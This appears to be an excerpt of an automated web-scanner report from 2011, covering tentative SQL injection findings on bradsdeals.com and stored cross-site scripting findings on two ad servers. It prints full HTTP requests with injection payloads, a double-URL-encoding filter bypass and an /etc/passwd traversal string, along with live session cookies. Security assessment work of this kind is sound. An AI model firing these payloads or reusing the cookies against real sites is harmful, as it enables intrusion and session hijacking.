<meta name="robots" content="noodp" /> <meta name="robots" content="noydir" />
<meta name="robots" content="noindex, nofollow" /> <link rel="canonical" href="http://www.bradsdeals.com/dealsoftheday/subscribe/b" /> <meta property="og:image" content="http://www.bradsdeals.com/res/images/shareimg.png"/> <link rel="image_src" href="http://www.bradsdeals.com/res/images/shareimg.png" /> <!-- RSS --> <link rel="alternate" type="application/rss+xml" title="BradsDeals.com Most Recent Deals" href="http://www.bradsdeals.com/feed" /> <!-- /RSS -->
<!-- CSS --> <link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/opt/screen.css?v=20110616" media="screen" />
<!--[if lte IE 7]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie7.css" media="screen" /><![endif]--> <!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie6.css" media="screen" /><![endif]-->
<link rel="s ...[SNIP]...
1.39. http://www.bradsdeals.com/res/opt/global.js [v parameter]
Summary
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.bradsdeals.com |
| Path: | /res/opt/global.js |
Issue detail
The v parameter appears to be vulnerable to SQL injection attacks. The payloads 62280894%20or%201%3d1--%20 and 62280894%20or%201%3d2--%20 were each submitted in the v parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this case Response 1 carries an X-dotDefender-denied: 1 header and a generic block page, while Response 2 is the static JavaScript file served normally with its usual Last-Modified and ETag headers, so the difference between the two responses is consistent with a web application firewall rejecting the first payload rather than with a change in the result of a SQL query; a cache-busting version parameter on a static file is unlikely to reach a database at all, so treat the finding as unconfirmed until manual review shows otherwise.
Request 1
GET /res/opt/global.js?v=2011082962280894%20or%201%3d1--%20 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=40626594; CFTOKEN=23649149; TID=306656; LB-Persist=/pPhdebA/HT971C4FjQO/6Xok17iTa3KEc4Lh3NCVVGPLf87tgiQBEUoPmU9nYohCXdgBLGdk6jTDw==
Response 1
HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:39 GMT
Connection: close
Content-Length: 1305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Your request has been blocked</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/> <meta name="robots" content="noindex, nofollow, noarchive"/> <style type="text/css"> body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4} </style> </head> <body> <div id="box"> <span id="datetime">16-Sep-11</span> <h1>This request has been blocked.</h1><br/> <div id="message">Please contact the site administrator, and provide the following Reference ID:</div> <div id="refid">7BBF-BAD8-1227-0783</div> </div> </body> </html>
Request 2
GET /res/opt/global.js?v=2011082962280894%20or%201%3d2--%20 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=40626594; CFTOKEN=23649149; TID=306656; LB-Persist=/pPhdebA/HT971C4FjQO/6Xok17iTa3KEc4Lh3NCVVGPLf87tgiQBEUoPmU9nYohCXdgBLGdk6jTDw==
Response 2
HTTP/1.1 200 OK
Content-Type: text/javascript
Last-Modified: Mon, 29 Aug 2011 21:05:22 GMT
Accept-Ranges: bytes
ETag: "095625d8f66cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:40 GMT
Content-Length: 192992
/* * jQuery JavaScript Library v1.3.2 * http://jquery.com/ * * Copyright (c) 2009 John Resig * Dual licensed under the MIT and GPL licenses. * http://docs.jquery.com/License * * Date: 2009-02-19 17:34:21 -0500 (Thu, 19 Feb 2009) * Revision: 6246 */ (function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document;F.selector=E;return F}}else{return o(H).find(E)}}else{if(o.isFunction(E)){return o(document).ready(E)}}if(E.selector&&E.context){this.selector=E.selector;this.context=E.context}return this.setArray(o.isArray(E)?E:o.makeArray(E))},selector:"",jquery:"1.3.2",size:function(){return this.length},get:function(E){return E===g?Array.prototype.slice.call(this):this[E]},pushStack:function(F,H,E){var G=o(F);G.prevObject=this;G.context=this.context;if(H==="find"){G.selector=this.selector+(this.selector?" 
":"")+E}else{if(H){G.selector=this.selector+"."+H+"("+E+")"}}return G},setArray:function(E){this.length=0;Array.prototype.push.apply(this,E);return this},each:function(F,E){return o.each(this,F,E)},index:function(E){return o.inArray(E&&E.jquery?E[0]:E,this)},attr:function(F,H,G){var E=F;if(typeof F==="string"){if(H===g){return this[0]&&o[G||"attr"](this[0],F)}else{E={};E[F]=H}}return this.each(function(I){for(F in E){o.attr(G?this.style:this,F,o.prop(this,E[F],G,I,F))}})},css:function(E,F){if((E=="width"||E=="height")&&parseFloat(F)<0){F=g}return this.attr(E,F,"curCSS")},text:function(F){if(typeof F!=="object"&&F!=null){return this.empty().append((this[0]&&this[0].ownerDocument||document).createTextNode(F))}var E="";o.each(F||this,function(){o.each(this.child ...[SNIP]...
1.40. http://www.bradsdeals.com/res/opt/screen.css [v parameter]
Summary
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.bradsdeals.com |
| Path: | /res/opt/screen.css |
Issue detail
The v parameter appears to be vulnerable to SQL injection attacks. The payloads 19496541%20or%201%3d1--%20 and 19496541%20or%201%3d2--%20 were each submitted in the v parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this case Response 1 carries an X-dotDefender-denied: 1 header and a generic block page, while Response 2 is the static stylesheet served normally with its usual Last-Modified and ETag headers, so the difference between the two responses is consistent with a web application firewall rejecting the first payload rather than with a change in the result of a SQL query; a cache-busting version parameter on a static file is unlikely to reach a database at all, so treat the finding as unconfirmed until manual review shows otherwise.
Request 1
GET /res/opt/screen.css?v=2011061619496541%20or%201%3d1--%20 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=40626594; CFTOKEN=23649149; TID=306656; LB-Persist=/pPhdebA/HT971C4FjQO/6Xok17iTa3KEc4Lh3NCVVGPLf87tgiQBEUoPmU9nYohCXdgBLGdk6jTDw==
Response 1
HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:33 GMT
Connection: close
Content-Length: 1305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Your request has been blocked</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/> <meta name="robots" content="noindex, nofollow, noarchive"/> <style type="text/css"> body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4} </style> </head> <body> <div id="box"> <span id="datetime">16-Sep-11</span> <h1>This request has been blocked.</h1><br/> <div id="message">Please contact the site administrator, and provide the following Reference ID:</div> <div id="refid">5643-8923-23FA-8C9B</div> </div> </body> </html>
Request 2
GET /res/opt/screen.css?v=2011061619496541%20or%201%3d2--%20 HTTP/1.1 Host: www.bradsdeals.com Proxy-Connection: keep-alive Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=40626594; CFTOKEN=23649149; TID=306656; LB-Persist=/pPhdebA/HT971C4FjQO/6Xok17iTa3KEc4Lh3NCVVGPLf87tgiQBEUoPmU9nYohCXdgBLGdk6jTDw==
Response 2
HTTP/1.1 200 OK Content-Type: text/css Last-Modified: Mon, 29 Aug 2011 21:05:43 GMT Accept-Ranges: bytes ETag: "80ede6698f66cc1:0" Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Sat, 17 Sep 2011 01:35:34 GMT Content-Length: 69864
body{color:#666;background:#fff;font:75%/140% Arial,Tahoma,Verdana,Helvetica,sans-serif;margin:0;padding:0;}table{border-spacing:0;border-collapse:collapse;}ul,ol{margin:.25em 0 1em 2em;padding-left:0;}li{margin-top:.25em;margin-bottom:.5em;}dt{font-weight:bold;margin:.5em 0 .12em 0;}dd{margin:.12em 0 .5em 0;}fieldset{margin:32px 0;padding:12px;border:1px solid #ccc;}legend{font-size:16px;color:#666;}button,input{font-size:100%;font-family:Arial,Tahoma,Verdana,Helvetica,sans-serif;}a{color:#3c85de;text-decoration:none;}a.hover,a:hover{text-decoration:underline;}a img{border:none;}h1,h2,.h2,h3,h4,h5,h6{font-family:Arial,Tahoma,Verdana,Helvetica,sans-serif;line-height:120%;margin:0;}h1{font-size:220%;margin:.25em 0 .75em;font-weight:normal;}h2,.h2{font-size:200%;margin:1em 0 .5em;font-weight:normal;}h3{font-size:135%;margin:0 0 .5em;font-weight:normal;}h4{font-size:100%;margin:0;}h5{font-size:90%;}h6{font-size:80%;}h1.divider,h2.divider,.h2.divider{border-bottom:1px solid #ddd;padding-bottom:.5em;height:1%;}p{margin-top:1em;margin-bottom:1em;}b,strong{font-weight:bold;}i,em{font-style:oblique;}blockquote{margin:1em 3em;}.hr hr{display:none;}.skipper{position:absolute;left:-5000px;top:0;width:1px;height:1px;overflow:hidden;}.hide{position:absolute;left:-5000px;top:0;width:1px;height:1px;overflow:hidden;}.error{color:#AF0000;}img{-ms-interpolation-mode:bicubic;}.cfx:after{content:".";display:block;height:0;clear:both;visibility:hidden;}.cfx:after{line-height:0;}.cfx{display:inline-block;}/* Hides from IE-mac \*/ * html .cfx{height:1%;}.cfx{display:block;}/* End hide from IE-mac */body{background:#f8faeb url("../images/bg_body_tile.jpg") top center repeat;}#pageBounds{background:transparent url("../images/bg_body_top.jpg") top center repeat-x;}body.iframe{background:#fff none;padding:10px 20px;}#content{width:948px;margin:0 auto;position:relative;}#mainColumn{float:left;padding:0 
4px;width:580px;margin:0;position:relative;z-index:4;}#topRightColumn,#sideColumn{float:righ ...[SNIP]...
2. Cross-site scripting (stored)
There are 4 instances of this issue:
Issue background
Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.
The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.
Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).
Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.
Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
- Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
- User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
2.1. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ar.voicefive.com
Path: /bmx3/broker.pli
Issue detail
The value of the pid request parameter submitted to the URL /bmx3/broker.pli is copied into the HTML document as plain text between tags at the URL /bmx3/broker.pli. The payload 35525%253cscript%253ealert%25281%2529%253c%252fscript%253ef2ebf4b3f03 was submitted in the pid parameter. This input was returned as 35525<script>alert(1)</script>f2ebf4b3f03 in a subsequent request for the URL /bmx3/broker.pli.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the pid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /bmx3/broker.pli?pid=35525%253cscript%253ealert%25281%2529%253c%252fscript%253ef2ebf4b3f03&PRAd=348445181&AR_C=233006068 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://omg.yahoo.com/xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; UID=9cc29993-80.67.74.150-1314836282
Request 2
GET /bmx3/broker.pli?pid=p63514475&PRAd=348445181&AR_C=233006068 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://omg.yahoo.com/xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; UID=9cc29993-80.67.74.150-1314836282
Response 2
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 00:54:37 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p63514475=exp=26&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:54:37 2011&250d16de58214c9a371d551e=1&prad=348445181&arc=233006068&; expires=Fri 16-Dec-2011 00:54:37 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 30216
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"348445181",Pid:"p63514475",Arc:"233006068",Location: ...[SNIP]... 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&', "UID": '9cc29993-80.67.74.150-1314836282../../../../../../../../etc/passwd%009cc29993-80.67.74.150-1314836282', "ar_35525<script>alert(1)</script>f2ebf4b3f03": 'exp=1&initExp=Sat Sep 17 00:54:37 2011&recExp=Sat Sep 17 00:54:37 2011&prad=348445181&arc=233006068&', "BMX_3PC": '1', "ar_p63514475250d16deff7e44d5a47a3990": 'exp=1&initExp=Sat Sep 17 00:54:33 2 ...[SNIP]...
2.2. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]
Summary
Severity: High
Confidence: Certain
Host: http://d7.zedo.com
Path: /bar/v16-507/d3/jsc/fm.js
Issue detail
The value of the $ request parameter submitted to the URL /bar/v16-507/d3/jsc/fm.js is copied into a JavaScript string which is encapsulated in single quotation marks at the URL /bar/v16-507/d3/jsc/fm.js. The payload 284b8'-alert(1)-'04109d7f66c was submitted in the $ parameter. This input was returned unmodified in a subsequent request for the URL /bar/v16-507/d3/jsc/fm.js.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request 1
GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=284b8'-alert(1)-'04109d7f66c&s=2&z=0.2868958928156644 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0
Request 2
GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=collective728x90&s=2&z=0.2868958928156644 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0
Response 2
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=951:284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c';expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=826,187,14:951,2,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=28:27:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "aa1b9a-8952-4accb58ae5040" Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=18 Expires: Sat, 17 Sep 2011 01:49:38 GMT Date: Sat, 17 Sep 2011 01:49:20 GMT Content-Length: 2692 Connection: close
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var z11=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat='284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c'';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c'; ...[SNIP]...
2.3. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]
Summary
Severity: High
Confidence: Certain
Host: http://d7.zedo.com
Path: /bar/v16-507/d3/jsc/fm.js
Issue detail
The value of the $ request parameter submitted to the URL /bar/v16-507/d3/jsc/fm.js is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /bar/v16-507/d3/jsc/fm.js. The payload 5969c"-alert(1)-"5ef3bafc3c0 was submitted in the $ parameter. This input was returned unmodified in a subsequent request for the URL /bar/v16-507/d3/jsc/fm.js.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request 1
GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=5969c"-alert(1)-"5ef3bafc3c0&s=2&z=0.2868958928156644 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0
Request 2
GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=collective728x90&s=2&z=0.2868958928156644 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0
Response 2
